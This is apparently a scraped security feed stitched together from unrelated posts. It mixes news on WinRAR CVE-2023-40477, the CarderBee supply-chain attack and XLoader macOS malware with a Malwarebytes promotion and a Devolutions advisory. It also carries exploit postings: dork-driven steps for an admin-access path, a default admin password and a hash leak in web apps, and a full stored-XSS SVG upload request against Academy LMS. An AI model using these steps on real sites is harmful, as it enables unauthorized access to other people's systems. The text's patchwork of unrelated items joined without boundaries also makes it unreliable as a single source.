FlightPath LMS version 4.8.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v4.8.2 Insecure Direct Object Reference Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference vulnerability that allows an unauthorized administrative access.[+] Use payload : /tools/course-search/[+] http://127.0.0.1/getflightpathcom/sites/getflightpath/demo/4x/flightpath/tools/course-searchGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 4.8.2 Insecure Direct Object Reference

FleetCart Laravel Ecommerce System version 1.1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : FleetCart - Laravel Ecommerce System v1.1.2 Insecure Settings Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826?s_rank=175                                 |  | # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Use Payload : Email: admin@email.com & Password: 123456 [+] Panel : https://127.0.0.1/kingamesro/admin/mediaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FleetCart Laravel Ecommerce System 1.1.2 Insecure Settings

FixBook Repair Shop Management Tool version 2.2 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : FixBook - Repair Shop Management Tool v2.2 Password Hash Disclosure Vulnerability                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/fixbook-repair-shop-management-tool/12333567                                           || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Open the source code of the page.[+] Go 2 line 49  found pass of databass encrypted . view-source:http://target_site/repair/update/[+] Here Update admin information : http://127.0.0.1/epbuys.co.uk/repair/update/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FixBook Repair Shop Management Tool 2.2 Hash Disclosure

Categories: Exploits and vulnerabilities
Categories: News
Tags: WinRAR

Tags:  CVE-2023-40477

Tags:  RCE

Tags:  Windows 11

A new version of WinRAR is available that patches two vulnerabilities attackers could use for remote code execution.



(Read more...)




The post Update now! WinRAR files can be abused to run malware appeared first on Malwarebytes Labs.

A new version of the file archiving software WinRAR fixes two vulnerabilities that could allow an attacker to execute code on a target system. All the victim has to do is to open a specially crafted archive.

After receiving a report about the vulnerability in June, a new version of the software was published on August 2, 2023. Users should install the latest version (WinRAR 6.23 or later) at their earliest convenience.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE patched in this update is CVE-2023-40477 (with a CVSS score of 7.8 out of 10).

The vulnerability lies in how the software processes recovery volumes. The issue is due to the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.

The update release notification states that another vulnerability was fixed, described as:

> “WinRAR could start a wrong file after a user double clicked an item in a specially crafted archive.”

So, until you have installed the new version, it is advisable to be careful when someone sends you an archived file. Opening the archive to scan the content is not a safe option right now.

Given the great many users of WinRAR the impact of these vulnerabilities could be substantial, knowing that similar flaws were abused by hackers in the past to install malware.

Windows 11 users are likely to hold of on installing the latest version, because Microsoft announced their latest operating system (OS) will natively support RAR and some other archive formats.

> “We have added native support for additional archive formats, including tar, 7-zip, rar, gz and many others using the libarchive open-source project. You now can get improved performance of archive functionality during compression on Windows.”

Users of a cracked version of the software, which is probably another big group of users, will not be able to install the latest version right off the shelf, so they may remain vulnerable as well.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! WinRAR files can be abused to run malware

The hackers, who mostly targeted victims in Hong Kong, also hijacked Microsoft’s trust model to make their malware harder to detect.

Every software supply chain attack, in which hackers corrupt a legitimate application to push out their malware to hundreds or potentially thousands of victims, represents a disturbing new outbreak of a cybersecurity scourge. But when that supply chain attack is pulled off by a mysterious group of hackers, abusing a Microsoft trusted software model to make their malware pose as legitimate, it represents a dangerous and potentially new adversary worth watching.

Today, researchers on the Threat Hunter Team at Broadcom-owned security firm Symantec revealed that they'd detected a supply chain attack carried out by a hacker group that they've newly named CarderBee. According to Symantec, the hackers hijacked the software updates of a piece of Chinese-origin security software known as Cobra DocGuard, injecting their own malware to target about 100 computers across Asia, mostly in Hong Kong. Though some clues, like the exploitation of DocGuard and other malicious code they installed on victim machines, loosely link CarderBee with previous Chinese state-sponsored hacking operations, Symantec declined to identify CarderBee as any previously known group, suggesting it may be a new team.

Beyond the usual disturbing breach of trust in legitimate software that occurs in every software supply chain, Symantec says, the hackers also managed to get their malicious code—a backdoor known as Korplug or PlugX and commonly used by Chinese hackers—digitally signed by Microsoft. The signature, which Microsoft typically uses to designate trusted code, made the malware far harder to detect.

“Any time we see a software supply chain attack, it’s somewhat interesting. But in terms of sophistication, this is a cut above the rest,” says Dick O'Brien, a principal intelligence analyst on Symantec's research team. “This one has the hallmarks of an operator who knows what they’re doing.”

Cobra DocGuard, which is ironically marketed as security software for encrypting and protecting files based on a system of users' privileges inside an organization, has around 2,000 users, according to Symantec. So the fact that the hackers chose just 100 or so machines on which to install their malware—capable of everything from running commands to recording keystrokes—suggests that CarderBee may have combed thousands of potential victims to specifically target those users, O’Brien argues. Symantec declined to name the targeted victims or say whether they were largely government or private sector companies.

The Cobra DocGuard application is distributed by EsafeNet, a company owned by the security firm Nsfocus, which was founded in Mainland China in 2000 but now describes its headquarters as Milpitas, California. Symantec says it can't explain how CarderBee managed to corrupt the company's application, which in many software supply chain attacks involves hackers breaching a software distributor to corrupt their development process. Nsfocus didn't respond to WIRED's request for comment.

Symantec's discovery isn't actually the first time that Cobra DocGuard has been used to distribute malware. Cybersecurity firm ESET found that in September of last year a malicious update to the same application was used to breach a Hong Kong gambling company and plant a variant of the same Korplug code. ESET found that the gambling company also had been breached via the same method in 2021.

ESET pinned that earlier attack on the hacker group known as LuckyMouse, APT27, or Budworm, which is widely believed to be based in China and has for more than a decade targeted government agencies and government-related industries, including aerospace and defense. But despite the Korplug and CobraGuard connections, Symantec says it's too early to link the wider supply chain attack it has uncovered to the group behind the previous incidents.

“You can't rule out the idea that one APT group compromises this software, and then it becomes known that this software is vulnerable to this kind of compromise, and somebody else does it as well,” says Symantec's O'Brien, using the term APT to mean “advanced, persistent threat,” a common industry term for state-sponsored hacker groups. “We don't want to jump to conclusions.” O'Brien notes that another Chinese group, known as APT41 or Barium, has also carried out numerous supply chain attacks—perhaps more than any other team of hackers—and has used Korplug, too.

To add to the attack's stealth, the CarderBee hackers managed to somehow deceive Microsoft into lending extra legitimacy to their malware: They tricked the company into signing the Korplug backdoor with the certificates Microsoft uses in its Windows Hardware Compatibility Publisher program to designate trusted code, making it look far more legit than it is. That program typically requires a developer to register with Microsoft as a business entity and submit their code to Microsoft for approval. But the hackers appear to have obtained a Microsoft signature through either developer accounts they created themselves or obtained from other registered developers. Microsoft didn't respond to WIRED's request for more information on how it ended up signing malware used in the hackers' supply chain attack.

Malware that's signed by Microsoft is a long-running problem. Getting access to a registered developer account represents a hurdle to hackers, says Jake Williams, a former US National Security Agency hacker now on faculty at the Institute for Applied Network Security. But once that account is obtained, Microsoft is known to take a lax approach to vetting registered developers' code. “They typically sign whatever you, as the developer, submit,” Williams says. And those signatures can, in fact, make malware far harder to spot, he adds. “So many folks, when they threat-hunt, they start by exempting things that are signed by Microsoft,” Williams says.

That code-signing trick, combined with a well-executed supply chain attack, suggests a level of sophistication that makes CarderBee uniquely worthy of tracking, says Symantec's O'Brien—even for those outside of its current targeting in Hong Kong or Chinese neighbor countries. Regardless of whether you’re in China’s orbit, says O’Brien, “it’s certainly one to look out for.”

New Supply Chain Attack Hit Close to 100 Victims—and Clues Point to China

Categories: Personal
Malwarebytes' new Trusted Advisor makes security easy with a comprehensive, at-a-glance, real-time assessment.



(Read more...)




The post Trusted Advisor puts you in the security driving seat appeared first on Malwarebytes Labs.

Malwarebytes' new Trusted Advisor dashboard provides an easy to understand assessment of your security with a single comprehensive protection score, and clear, expert-driven advice.

Computer security can be difficult and time consuming. Getting it right means knowing what software needs to be updated, whether your system settings are configured securely, running active protection that can block and remove malware, and performing regular scans to uncover hidden threats.

Getting it wrong means leaving gaps in your defences that malware, criminal hackers, and other online threats can sneak through.

Trusted Advisor takes away the guesswork by delivering a holistic assessment of your security and privacy in a way that's easy to understand, making issues simple to correct. It combines the proven capabilities of Malwarebytes with the knowledge of the brightest industry experts to give you an expert assessment that puts you one step ahead of the cybercrooks.

**Protection score**

At the heart of Trusted Advisor is a single, easy to understand protection score. If you're rocking a 100% rating then you know you're crushing it.

If your score dips below 100%, we'll explain why, and offer you a checklist of items to improve your security.

Trusted Advisor's recommendations are practical and jargon-free, so they're easy to understand and action.

**Six steps to security**

Trusted Advisor monitors six broad categories of information. Each one affects your protection score according to its impact on your overall security:

*   **Real-Time Protection** monitors your computer continuously, stopping and removing threats like malware as they appear. It's vital for keeping you safe from the most destructive threats and the most common methods of infection, so Trusted Advisor will alert you if you aren't fully protected.
*   **Software updates** fix the coding flaws that cybercriminals exploit to steal data or put malware on your system. Staying up to date is one of the most important things you can do for your security, so Trusted Advisor has your back here too.
*   **General settings** covers settings within Malwarebytes, Windows, or your network preferences. Trusted Advisor checks for settings that may not be configured correctly. 
*   **Device scans** are routine scans that seek out hidden threats on your system. Malwareybytes' Smart Scan technology schedules scans so they run when your device isn't in use. If you get behind and need to run a scan manually, Trusted Advisor will tell you.
*   **Online privacy** helps you take a proactive stance on your privacy by hiding your IP address and blocking third-party ad trackers, making you're harder to track on the web. Trusted Advisor monitors this so you only part with the personal information you intend to.
*   **Device health** guards against slowdowns and other performance problems. Trusted Advisor helps you get the most out of your system so that you aren't left guessing whether it was malware grinding your device to a halt.

**Try it today**

If you're an existing Malwarebytes customer you will get Trusted Advisor automatically, but if you're in a hurry, you can go to **Settings** > **About** > **Check for updates** and get it right now. If you aren't, you can get Trusted Advisor by just **download the latest version of Malwarebytes**.

Trusted Advisor puts you in the security driving seat

A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."
"The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application

Malware / Endpoint Security

A new variant of an Apple macOS malware called **XLoader** has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."

"The new version of **XLoader** is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)."

XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file.

"Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE with Macs over a decade ago," the cybersecurity firm noted at the time.

The latest iteration of XLoader gets around this limitation by switching to programming languages such as C and Objective C, with the disk image file signed on July 17, 2023. Apple has since revoked the signature.

SentinelOne said it detected multiple submissions of the artifact on VirusTotal all through the month of July 2023, indicating a widespread campaign.

"Advertisements on crimeware forums offer the Mac version for rental at $199/month or $299/3 months," the researchers said. "Interestingly, this is relatively expensive compared to Windows variants of XLoader, which go for $59/month and $129/3 months."

Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence.

XLoader is designed to harvest clipboard data as well as information stored in the directories associated with web browsers such as Google Chrome and Mozilla Firefox. Safari, however, is not targeted.

Besides taking steps to evade analysis both manually and by automated solutions, the malware is configured to run sleep commands to delay its execution and avoid raising any red flags.

"XLoader continues to present a threat to macOS users and businesses," the researchers concluded.

"This latest iteration masquerading as an office productivity application shows that the targets of interest are clearly users in a working environment. The malware attempts to steal browser and clipboard secrets that could be used or sold to other threat actors for further compromise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App


Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager versions 2023.2.19 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature.



**DEVO-2023-0015****Summary**

Remote Desktop Manager Windows is affected by multiple security vulnerabilities.

**Affected Products**

Remote Desktop Manager Windows

**Change Log**

Initial Publication - 2023-08-21

**Severity**

Medium

**Product**

Remote Desktop Manager Windows

**Fix Version**

2023.2.22

**Unauthorized Connection Exploit via Remote Tools in Remote Desktop Manager****Description**

Inadequate validation of permissions when employing remote tools and macros within Devolutions Remote Desktop Manager versions 2023.2.19 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.2.22 and higher.

**Severity**

Medium - 3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

**Affected Products**

Remote Desktop Manager Windows 2023.2.19 and earlier.

**CVE(s)**

CVE-2023-4373

**Incorrect vault used for the duplicate entry feature.****Description**

Improper access controls in the entry duplication component in Devolutions Remote Desktop Manager 2023.2.19 and earlier versions on Windows allows an authenticated user, under specific circumstances, to inadvertently share their personal vault entry with shared vaults via an incorrect vault in the duplication write process.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.2.22 and higher.

**Severity**

Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N 5.7

**Affected Products**

Remote Desktop Manager Windows 2023.2.19 and earlier.

**CVE(s)**

CVE-2023-4417

CVE-2023-4373: Devolutions

Improper access controls in the entry duplication component in Devolutions Remote Desktop Manager 2023.2.19 and earlier versions on Windows allows an authenticated user, under specific circumstances, to inadvertently share their personal vault entry with shared vaults via an incorrect vault in the duplication write process.

CVE-2023-4417: Devolutions

Academy LMS version 6.1 suffers from an upload vulnerability that could lead to persistent cross site scripting attacks.

    # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload# Exploit Author: CraCkEr# Date: 05/08/2023# Vendor: Creativeitem# Vendor Homepage: https://academylms.net/# Software Link: https://demo.academylms.net/# Tested on: Windows 10 Pro# Impact: Allows User to upload files to the web server# CWE: CWE-79 - CWE-74 - CWE-707## DescriptionAllows Attacker to upload malicious files onto the server, such as Stored XSS## Steps to Reproduce:1. Login as a [Normal User]2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings3. Upload any Image into the [avatar]4. Capture the POST Request with [Burp Proxy Intercept]5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] -----------------------------------------------------------POST /wp-admin/async-upload.php HTTP/2-----------------------------------------------------------Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS by CraCkEr");  </script></svg>-----------------------------------------------------------6. Send the Request7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg[-] Done

Tag

#windows